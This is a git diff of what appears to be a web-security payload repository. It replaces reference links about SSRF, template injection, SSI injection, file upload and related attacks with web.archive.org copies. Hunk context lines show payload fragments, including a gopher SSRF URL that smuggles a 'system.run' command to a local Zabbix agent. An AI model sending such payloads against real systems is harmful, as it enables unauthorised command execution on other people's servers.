+* [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper - Mehmet Ince - August 1, 2017](https://web.archive.org/web/20170802071522/https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
diff --git a/Server Side Include Injection/README.md b/Server Side Include Injection/README.md
index 9826857..fa45604 100644
--- a/Server Side Include Injection/README.md	
+++ b/Server Side Include Injection/README.md	
@@ -67,9 +67,9 @@ Surrogate-Control: content="ESI/1.0"
 
 ## References
 
-* [Beyond XSS: Edge Side Include Injection - Louis Dion-Marcil - April 3, 2018](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
-* [DEF CON 26 - Edge Side Include Injection Abusing Caching Servers into SSRF - ldionmarcil - October 23, 2018](https://www.youtube.com/watch?v=VUZGZnpSg8I)
-* [ESI Injection Part 2: Abusing specific implementations - Philippe Arteau - May 2, 2019](https://gosecure.ai/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
-* [Exploiting Server Side Include Injection - n00py - August 15, 2017](https://www.n00py.io/2017/08/exploiting-server-side-include-injection/)
-* [Server Side Inclusion/Edge Side Inclusion Injection - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/server-side-inclusion-edge-side-inclusion-injection)
-* [Server-Side Includes (SSI) Injection - Weilin Zhong, Nsrav - December 4, 2019](https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection)
+* [Beyond XSS: Edge Side Include Injection - Louis Dion-Marcil - April 3, 2018](https://web.archive.org/web/20190321030437/https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection)
+* [DEF CON 26 - Edge Side Include Injection Abusing Caching Servers into SSRF - ldionmarcil - October 23, 2018](https://web.archive.org/web/20250916100719/https://www.youtube.com/watch?v=VUZGZnpSg8I)
+* [ESI Injection Part 2: Abusing specific implementations - Philippe Arteau - May 2, 2019](https://web.archive.org/web/20260208231729/https://gosecure.ai/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations)
+* [Exploiting Server Side Include Injection - n00py - August 15, 2017](https://web.archive.org/web/20260115183939/https://www.n00py.io/2017/08/exploiting-server-side-include-injection/)
+* [Server Side Inclusion/Edge Side Inclusion Injection - HackTricks - July 19, 2024](https://web.archive.org/web/20210615171520/https://book.hacktricks.xyz/pentesting-web/server-side-inclusion-edge-side-inclusion-injection)
+* [Server-Side Includes (SSI) Injection - Weilin Zhong, Nsrav - December 4, 2019](https://web.archive.org/web/20220123033237/https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection)
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index 34a6bd9..a6cace1 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -438,27 +438,27 @@ https://example.com/ssrf.php?url=http://brutelogic.com.br/poc.svg
 
 ## References
 
-* [A New Era Of SSRF - Exploiting URL Parsers - Orange Tsai - September 27, 2017](https://www.youtube.com/watch?v=D1S-G8rJrEk)
-* [Blind SSRF on errors.hackerone.net - chaosbolt - June 30, 2018](https://hackerone.com/reports/374737)
-* [ESEA Server-Side Request Forgery and Querying AWS Meta Data - Brett Buerhaus - April 18, 2016](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/)
-* [Hacker101 SSRF - Cody Brocious - October 29, 2018](https://www.youtube.com/watch?v=66ni2BTIjS8)
-* [Hackerone - How To: Server-Side Request Forgery (SSRF) - Jobert Abma - June 14, 2017](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
+* [A New Era Of SSRF - Exploiting URL Parsers - Orange Tsai - September 27, 2017](https://web.archive.org/web/20171219113122/https://www.youtube.com/watch?v=D1S-G8rJrEk)
+* [Blind SSRF on errors.hackerone.net - chaosbolt - June 30, 2018](https://web.archive.org/web/20180711141712/https://hackerone.com/reports/374737)
+* [ESEA Server-Side Request Forgery and Querying AWS Meta Data - Brett Buerhaus - April 18, 2016](https://web.archive.org/web/20251203033430/https://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/)
+* [Hacker101 SSRF - Cody Brocious - October 29, 2018](https://web.archive.org/web/20240905134609/https://www.youtube.com/watch?v=66ni2BTIjS8)
+* [Hackerone - How To: Server-Side Request Forgery (SSRF) - Jobert Abma - June 14, 2017](https://web.archive.org/web/20210805121112/https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
 * [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity - December 17, 2017](http://web.archive.org/web/20171220083457/http://www.sxcurity.pro/2017/12/17/hackertarget/)
-* [How I Chained 4 Vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai - July 28, 2017](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
-* [Les Server Side Request Forgery : Comment contourner un pare-feu - Geluchat - September 16, 2017](https://www.dailysecurity.fr/server-side-request-forgery/)
-* [PHP SSRF - @secjuice - theMiddle - March 1, 2018](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
-* [Piercing the Veil: Server Side Request Forgery to NIPRNet Access - Alyssa Herrera - April 9, 2018](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
-* [Server-side Browsing Considered Harmful - Nicolas Grégoire (Agarri) - May 21, 2015](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
-* [SSRF - Server-Side Request Forgery (Types and Ways to Exploit It) Part-1 - SaN ThosH (madrobot) - January 10, 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978)
-* [SSRF and Local File Read in Video to GIF Converter - sl1m - February 11, 2016](https://hackerone.com/reports/115857)
-* [SSRF in https://imgur.com/vidgif/url - Eugene Farfel (aesteral) - February 10, 2016](https://hackerone.com/reports/115748)
-* [SSRF in proxy.duckduckgo.com - Patrik Fábián (fpatrik) - May 27, 2018](https://hackerone.com/reports/358119)
-* [SSRF on *shopifycloud.com - Rojan Rijal (rijalrojan) - July 17, 2018](https://hackerone.com/reports/382612)
-* [SSRF Protocol Smuggling in Plaintext Credential Handlers: LDAP - Willis Vandevanter (@0xrst) - February 5, 2019](https://www.silentrobots.com/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/)
+* [How I Chained 4 Vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai - July 28, 2017](https://web.archive.org/web/20260305031002/https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
+* [Les Server Side Request Forgery : Comment contourner un pare-feu - Geluchat - September 16, 2017](https://web.archive.org/web/20250514163556/https://www.dailysecurity.fr/server-side-request-forgery/)
+* [PHP SSRF - @secjuice - theMiddle - March 1, 2018](https://web.archive.org/web/20180308041252/https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
+* [Piercing the Veil: Server Side Request Forgery to NIPRNet Access - Alyssa Herrera - April 9, 2018](https://web.archive.org/web/20180418081910/https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
+* [Server-side Browsing Considered Harmful - Nicolas Grégoire (Agarri) - May 21, 2015](https://web.archive.org/web/20260212042925/https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
+* [SSRF - Server-Side Request Forgery (Types and Ways to Exploit It) Part-1 - SaN ThosH (madrobot) - January 10, 2019](https://web.archive.org/web/20260111214124/https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978)
+* [SSRF and Local File Read in Video to GIF Converter - sl1m - February 11, 2016](https://web.archive.org/web/20250426211714/https://hackerone.com/reports/115857)
+* [SSRF in https://imgur.com/vidgif/url - Eugene Farfel (aesteral) - February 10, 2016](https://web.archive.org/web/20250905152736/https://hackerone.com/reports/115748)
+* [SSRF in proxy.duckduckgo.com - Patrik Fábián (fpatrik) - May 27, 2018](https://web.archive.org/web/20250623102403/https://hackerone.com/reports/358119)
+* [SSRF on *shopifycloud.com - Rojan Rijal (rijalrojan) - July 17, 2018](https://web.archive.org/web/20250623094825/https://hackerone.com/reports/382612)
+* [SSRF Protocol Smuggling in Plaintext Credential Handlers: LDAP - Willis Vandevanter (@0xrst) - February 5, 2019](https://web.archive.org/web/20260115204744/https://www.silentrobots.com/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/)
 * [SSRF Tips - xl7dev - July 3, 2016](http://web.archive.org/web/20170407053309/http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
-* [SSRF's Up! Real World Server-Side Request Forgery (SSRF) - Alberto Wilson and Guillermo Gabarrin - January 25, 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)
-* [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例 - mrtc0 - September 5, 2018](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/)
+* [SSRF's Up! Real World Server-Side Request Forgery (SSRF) - Alberto Wilson and Guillermo Gabarrin - January 25, 2019](https://web.archive.org/web/20260219110439/https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)
+* [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例 - mrtc0 - September 5, 2018](https://web.archive.org/web/20250717205545/https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/)
 * [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - June 12, 2019](https://github.com/allanlw/svg-cheatsheet)
 * [URL Eccentricities in Java - sammy (@PwnL0rd) - November 2, 2020](http://web.archive.org/web/20201107113541/https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/)
-* [Web Security Academy Server-Side Request Forgery (SSRF) - PortSwigger - July 10, 2019](https://portswigger.net/web-security/ssrf)
-* [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG (@quanyang) - June 22, 2016](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
+* [Web Security Academy Server-Side Request Forgery (SSRF) - PortSwigger - July 10, 2019](https://web.archive.org/web/20190710130620/https://portswigger.net/web-security/ssrf)
+* [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG (@quanyang) - June 22, 2016](https://web.archive.org/web/20260301043216/https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
diff --git a/Server Side Request Forgery/SSRF-Advanced-Exploitation.md b/Server Side Request Forgery/SSRF-Advanced-Exploitation.md
index f75d1ba..1c3e331 100644
--- a/Server Side Request Forgery/SSRF-Advanced-Exploitation.md	
+++ b/Server Side Request Forgery/SSRF-Advanced-Exploitation.md	
@@ -162,7 +162,7 @@ gopher://127.0.0.1:10050/_system.run%5B%28id%29%3Bsleep%202s%5D
 
 ## References
 
-* [SSRFmap - Introducing the AXFR Module - Swissky - June 13, 2024](https://swisskyrepo.github.io/SSRFmap-axfr/)
-* [How I Converted SSRF to XSS in Jira - Ashish Kunwar - June 1, 2018](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
+* [SSRFmap - Introducing the AXFR Module - Swissky - June 13, 2024](https://web.archive.org/web/20240614121446/https://swisskyrepo.github.io/SSRFmap-axfr/)
+* [How I Converted SSRF to XSS in Jira - Ashish Kunwar - June 1, 2018](https://web.archive.org/web/20251116223629/https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
 * [Pong [EN] | FCSC 2024 - Arthur Deloffre (@Vozec1) - April 12, 2024](https://vozec.fr/writeups/pong-fcsc2024-en/)
 * [Pong [EN] | FCSC 2024 - Kévin - Mizu (@kevin_mizu) - April 13, 2024](https://mizu.re/post/pong)
diff --git a/Server Side Request Forgery/SSRF-Cloud-Instances.md b/Server Side Request Forgery/SSRF-Cloud-Instances.md
index f59ca0d..543fcef 100644
--- a/Server Side Request Forgery/SSRF-Cloud-Instances.md	
+++ b/Server Side Request Forgery/SSRF-Cloud-Instances.md	
@@ -330,4 +330,4 @@ More info: <https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-s
 ## References
 
 * [Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - December 13, 2017](https://web.archive.org/web/20180210093624/https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/)
-* [Exploiting SSRF in AWS Elastic Beanstalk - Sunil Yadav - February 1, 2019](https://notsosecure.com/exploiting-ssrf-aws-elastic-beanstalk)
+* [Exploiting SSRF in AWS Elastic Beanstalk - Sunil Yadav - February 1, 2019](https://web.archive.org/web/20251113080112/https://notsosecure.com/exploiting-ssrf-aws-elastic-beanstalk)
diff --git a/Server Side Template Injection/ASP.md b/Server Side Template Injection/ASP.md
index ca2e885..39c32a8 100644
--- a/Server Side Template Injection/ASP.md	
+++ b/Server Side Template Injection/ASP.md	
@@ -31,4 +31,4 @@
 
 ## References
 
-- [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - April 15, 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
+- [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - April 15, 2020](https://web.archive.org/web/20240905143644/http://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md
index 4f6d898..043f1f1 100644
--- a/Server Side Template Injection/Java.md	
+++ b/Server Side Template Injection/Java.md	
@@ -510,16 +510,16 @@ Time-Based:
 ## References
 
 - [Bean Stalking: Growing Java beans into RCE - Alvaro Munoz - July 7, 2020](https://securitylab.github.com/research/bean-validation-RCE)
-- [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Peter M (@pmnh_) - December 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
-- [Expression Language Injection - OWASP - December 4, 2019](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)
-- [Expression Language injection - PortSwigger - January 27, 2019](https://portswigger.net/kb/issues/00100f20_expression-language-injection)
-- [Leveraging the Spring Expression Language (SpEL) injection vulnerability (a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/)
-- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
-- [RCE in Hubspot with EL injection in HubL - @fyoorer - December 7, 2018](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)
-- [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - January 29, 2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
-- [Server Side Template Injection – on the example of Pebble - Michał Bentkowski - September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
+- [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Peter M (@pmnh_) - December 4, 2022](https://web.archive.org/web/20230203103413/https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
+- [Expression Language Injection - OWASP - December 4, 2019](https://web.archive.org/web/20200422030628/https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)
+- [Expression Language injection - PortSwigger - January 27, 2019](https://web.archive.org/web/20251215015718/https://portswigger.net/kb/issues/00100f20_expression-language-injection)
+- [Leveraging the Spring Expression Language (SpEL) injection vulnerability (a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://web.archive.org/web/20250219021221/https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/)
+- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://web.archive.org/web/20240906203847/https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
+- [RCE in Hubspot with EL injection in HubL - @fyoorer - December 7, 2018](https://web.archive.org/web/20181207164702/https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)
+- [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - January 29, 2019](https://web.archive.org/web/20200923134700/https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
+- [Server Side Template Injection – on the example of Pebble - Michał Bentkowski - September 17, 2019](https://web.archive.org/web/20250810034644/https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
 - [Server-Side Template Injection: RCE For The Modern Web App - James Kettle (@albinowax) - December 10, 2015](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
-- [Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle (@albinowax) - August 8, 2015](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
-- [Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle (@albinowax) - December 28, 2015](https://www.youtube.com/watch?v=3cT0uE7Y87s)
-- [VelocityServlet Expression Language injection - MagicBlue - November 15, 2017](https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/)
+- [Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle (@albinowax) - August 8, 2015](https://web.archive.org/web/20150808084830/https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
+- [Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle (@albinowax) - December 28, 2015](https://web.archive.org/web/20200501162014/https://www.youtube.com/watch?v=3cT0uE7Y87s)
+- [VelocityServlet Expression Language injection - MagicBlue - November 15, 2017](https://web.archive.org/web/20220412162651/https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/)
 - [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/JavaScript.md b/Server Side Template Injection/JavaScript.md
index 8e8d861..f37f3b6 100644
--- a/Server Side Template Injection/JavaScript.md	
+++ b/Server Side Template Injection/JavaScript.md	
@@ -168,5 +168,5 @@ ${= _.VERSION}
 ## References
 
 - [Exploiting Less.js to Achieve RCE - Jeremy Buis - July 1, 2021](https://web.archive.org/web/20210706135910/https://www.softwaresecured.com/exploiting-less-js/)
-- [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
+- [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://web.archive.org/web/20260207143828/https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
 - [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md
index 97be31c..7b9c0a9 100644
--- a/Server Side Template Injection/PHP.md	
+++ b/Server Side Template Injection/PHP.md	
@@ -341,6 +341,6 @@ layout template:
 
 ## References
 
-- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
+- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://web.archive.org/web/20240906203847/https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
 - [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)
 - [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md
index f5ce2a8..4bd5b28 100644
--- a/Server Side Template Injection/Python.md	
+++ b/Server Side Template Injection/Python.md	
@@ -457,10 +457,10 @@ Reference and explanation of payload can be found [yeswehack/server-side-templat
 
 ## References
 
-- [Cheatsheet - Flask & Jinja2 SSTI - phosphore - September 3, 2018](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
+- [Cheatsheet - Flask & Jinja2 SSTI - phosphore - September 3, 2018](https://web.archive.org/web/20191029021639/http://pequalsnp-team.github.io:80/cheatsheet/flask-jinja2-ssti)
 - [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
-- [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/)
-- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
-- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
-- [The minefield between syntaxes: exploiting syntax confusions in the wild - Brumens - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)
+- [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://web.archive.org/web/20180901222505/https://0day.work/jinja2-template-injection-filter-bypasses/)
+- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://web.archive.org/web/20240906203847/https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
+- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://web.archive.org/web/20210826203322/https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
+- [The minefield between syntaxes: exploiting syntax confusions in the wild - Brumens - October 17, 2025](https://web.archive.org/web/20251006113218/https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)
 - [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index e935fe6..a1b493a 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -218,11 +218,11 @@ Once the template engine is identified, the attacker injects more complex expres
 
 ## References
 
-- [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf)
-- [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
+- [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://web.archive.org/web/20160311193057/https://portswigger.net/knowledgebase/papers/ServerSideTemplateInjection.pdf)
+- [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://web.archive.org/web/20231210014226/https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
 - [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
-- [A Pentester's Guide to Server Side Template Injection (SSTI) - Busra Demir - December 24, 2020](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
-- [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - August 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
-- [Template Engines Injection 101 - Mahmoud M. Awali - November 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
-- [Template Injection On Hardened Targets - Lucas 'BitK' Philippe - September 28, 2022](https://youtu.be/M0b_KA0OMFw)
-- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
+- [A Pentester's Guide to Server Side Template Injection (SSTI) - Busra Demir - December 24, 2020](https://web.archive.org/web/20260111213449/https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
+- [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - August 22, 2018](https://web.archive.org/web/20180928123607/https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
+- [Template Engines Injection 101 - Mahmoud M. Awali - November 1, 2024](https://web.archive.org/web/20251104003639/https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
+- [Template Injection On Hardened Targets - Lucas 'BitK' Philippe - September 28, 2022](https://web.archive.org/web/20230314135020/https://youtu.be/M0b_KA0OMFw)
+- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://web.archive.org/web/20240906203847/https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
diff --git a/Tabnabbing/README.md b/Tabnabbing/README.md
index 9d51665..fcaeb91 100644
--- a/Tabnabbing/README.md
+++ b/Tabnabbing/README.md
@@ -37,5 +37,5 @@ Search for the following link formats:
 
 ## References
 
-* [Reverse Tabnabbing - OWASP - October 20, 2020](https://owasp.org/www-community/attacks/Reverse_Tabnabbing)
-* [Tabnabbing - Wikipedia - May 25, 2010](https://en.wikipedia.org/wiki/Tabnabbing)
+* [Reverse Tabnabbing - OWASP - October 20, 2020](https://web.archive.org/web/20200428035205/https://owasp.org/www-community/attacks/Reverse_Tabnabbing)
+* [Tabnabbing - Wikipedia - May 25, 2010](https://web.archive.org/web/20251216150740/https://en.wikipedia.org/wiki/Tabnabbing)
diff --git a/Type Juggling/README.md b/Type Juggling/README.md
index 1a6149a..6f329a7 100644
--- a/Type Juggling/README.md	
+++ b/Type Juggling/README.md	
@@ -153,8 +153,8 @@ The exploitation phase is the following:
 
 ## References
 
-* [(Super) Magic Hashes - myst404 (@myst404_) - October 7, 2019](https://offsec.almond.consulting/super-magic-hash.html)
+* [(Super) Magic Hashes - myst404 (@myst404_) - October 7, 2019](https://web.archive.org/web/20191113170442/https://offsec.almond.consulting/super-magic-hash.html)
 * [Magic Hashes - Robert Hansen - May 11, 2015](http://web.archive.org/web/20160722013412/https://www.whitehatsec.com/blog/magic-hashes/)
 * [Magic hashes – PHP hash "collisions" - Michal Špaček (@spaze) - May 6, 2015](https://github.com/spaze/hashes)
 * [PHP Magic Tricks: Type Juggling - Chris Smith (@chrismsnz) - August 18, 2020](http://web.archive.org/web/20200818131633/https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf)
-* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling - Tyler Borland (TurboBorland) - August 17, 2013](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
+* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling - Tyler Borland (TurboBorland) - August 17, 2013](https://web.archive.org/web/20131129232245/http://turbochaos.blogspot.com:80/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
diff --git a/Upload Insecure Files/Configuration Apache .htaccess/README.md b/Upload Insecure Files/Configuration Apache .htaccess/README.md
index 707de25..7b64239 100644
--- a/Upload Insecure Files/Configuration Apache .htaccess/README.md	
+++ b/Upload Insecure Files/Configuration Apache .htaccess/README.md	
@@ -73,6 +73,6 @@ If the `exif_imagetype` function is used on the server side to determine the ima
 
 ## References
 
-* [Attacking Webservers Via .htaccess - Eldar Marcussen - May 17, 2011](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
-* [Protection from Unrestricted File Upload Vulnerability - Narendra Shinde - October 22, 2015](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
-* [Insomnihack Teaser 2019 / l33t-hoster - Ian Bouchard (@Corb3nik) - January 20, 2019](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster)
+* [Attacking Webservers Via .htaccess - Eldar Marcussen - May 17, 2011](https://web.archive.org/web/20200203171034/https://www.justanotherhacker.com:80/2011/05/htaccess-based-attacks.html)
+* [Protection from Unrestricted File Upload Vulnerability - Narendra Shinde - October 22, 2015](https://web.archive.org/web/20200812181326/https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
+* [Insomnihack Teaser 2019 / l33t-hoster - Ian Bouchard (@Corb3nik) - January 20, 2019](https://web.archive.org/web/20190125123231/http://corb3nik.github.io:80/blog/insomnihack-teaser-2019/l33t-hoster)
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index 75f5aa9..0bf329b 100644
--- a/Upload Insecure Files/README.md	
+++ b/Upload Insecure Files/README.md	
@@ -367,21 +367,21 @@ More payloads in the folder `CVE FFmpeg HLS/`.
 
 ## References
 
-* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella - 28 Feb 2023](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
